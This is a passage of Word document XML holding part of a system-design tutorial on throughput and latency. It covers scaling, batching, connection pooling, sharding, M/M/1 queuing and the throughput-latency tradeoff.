        </w:rPr>
        <w:t>Below saturation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Increasing throughput barely affects latency. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At saturation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Latency spikes dramatically. Queues build. System becomes unresponsive. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Beyond saturation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Throughput may actually DECREASE (thrashing, retries, timeouts consuming resources).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E26D6DC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6 Throughput Optimization Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D9010" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Horizontal scaling (more instances):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5C7CFF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19340B8B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>1 server: 10K RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CABA337" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>10 servers: 100K RPS (linear scaling if no shared bottleneck)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA17F5F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Batching (amortize overhead):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A04C3B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9962C8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Individual inserts: 1000 INSERT statements = 1000 round trips = 200ms total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506F42FC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Batch insert: 1 INSERT with 1000 rows = 1 round trip = 5ms total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57699D74" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Throughput: 5x–100x improvement for write-heavy workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CA582A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Async processing (decouple producer from consumer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A501C0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F40E8F4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Synchronous: Accept request → process → respond (limits RPS to processing_time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7835E068" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Asynchronous: Accept request → queue → respond "accepted" → process later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EEFB14" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Ingest throughput: limited only by queue write speed (100K+ msg/sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C230D7F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Processing throughput: scales independently with consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C9BC2B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Connection pooling (reduce per-request overhead):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4144A15A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EECA79" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Without pool: Each request opens TCP+TLS connection → 100ms overhead → max 10 RPS/connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA3017" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>With pool: 100 pre-established connections → 100 concurrent requests → 5000 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4473BBAC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Sharding (remove single-node bottleneck):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F38835" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD211C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>1 database: 20K QPS (single node limit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAC106D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>10 shards: 200K QPS (each shard handles 20K QPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF1CF6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Read replicas (scale reads independently):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5206CA67" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698FC4BB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>1 primary: 20K reads + 5K writes = 25K QPS total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7B28AD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>1 primary + 4 replicas: 80K reads (distributed) + 5K writes = 85K QPS total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED46085" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Efficient serialization (reduce CPU per request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4487A8D4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364B70B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>JSON parsing: 100K ops/sec per core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CED54B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Protobuf parsing: 500K ops/sec per core → 5x more throughput per core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED99635" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="083CF57B">
          <v:rect id="_x0000_i5105" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6441AD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. The Relationship Between Throughput and Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D385C31" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 They Are Independent... Until They're Not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2635B58B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At low utilization:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Throughput increases without affecting latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75826524" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266F1981" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Load: 10% of capacity → Latency: 5ms, Throughput: 1000 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F32346C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Load: 30% of capacity → Latency: 5ms, Throughput: 3000 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1411BC73" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Load: 50% of capacity → Latency: 6ms, Throughput: 5000 RPS (still OK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07773783" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At high utilization:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Increasing throughput causes latency to skyrocket (queuing theory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039944C1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF6161" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Load: 70% of capacity → Latency: 8ms, Throughput: 7000 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7781BB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Load: 85% of capacity → Latency: 15ms, Throughput: 8500 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B8C551" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Load: 95% of capacity → Latency: 50ms, Throughput: 9500 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79767ADB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Load: 99% of capacity → Latency: 200ms+, Throughput: 9900 RPS (barely increasing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515419DF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Queuing Theory — Why Latency Explodes Near Capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227152A9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The M/M/1 queue model (single server):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707CDE48" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0168558A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Average wait time = Service_time / (1 - Utilization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA63978" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="75F77C1F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Utilization (ρ)  │ Latency multiplier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32619A33" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>─────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65656C2B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">     10%         │     1.1x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF39F0F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">     50%         │     2x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632A02CD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">     70%         │     3.3x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBA5228" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">     80%         │     5x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEEA0A5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">     90%         │     10x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1095CB29" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     95%         │     20x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9FA8FA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">     99%         │     100x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51226ACB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is the most important relationship in system design capacity planning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3067BDC5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>A system running at 90% utilization has </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10x the latency</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> of the same system at 50% utilization. This is not a bug — it's fundamental queuing theory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E8081C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implication for capacity planning:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Never design to run at &gt; 70–80% utilization. The latency penalty above 80% is severe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8BCFF8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 The Throughput-Latency Tradeoff Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B646F8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Batching — trades latency for throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCD64D2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A1A622" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>No batching: Each item processed immediately → low latency, lower throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756F11A8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Latency: 1ms per item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410559C9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Throughput: limited by per-item overhead (1000 items/sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05524253" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="3FC71683" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">Batching (wait 10ms for a batch of 100): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B76772" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Latency: 10ms (waiting time) + 5ms (batch processing) = 15ms per item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0861AC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Throughput: 100 items / 5ms = 20,000 items/sec (20x improvement!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6297D47B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Batching increases latency but dramatically increases throughput by amortizing fixed costs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BF5A15" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nagle's algorithm (TCP — batching at the kernel level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EFCAF1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1429"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Kernel delays sending small packets, hoping more data will arrive to fill a full segment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32496E5F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1429"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Improves throughput (fewer packets, less overhead).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461BFECA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1429"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Hurts latency (data waits up to 40ms before being sent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A61C7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1429"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Disabled for latency-sensitive applications: TCP_NODELAY.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1855D355" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write coalescing (databases):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9914A9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1430"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Database buffers writes and flushes periodically (every 10ms or when buffer is full).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBA5463" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1430"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Each individual write has higher latency (waits for flush).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D442E42" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1430"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Total throughput is much higher (one sequential I/O writes 100 records vs. 100 random I/Os).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAF8113" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Optimizing for Both Simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F7B3B5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
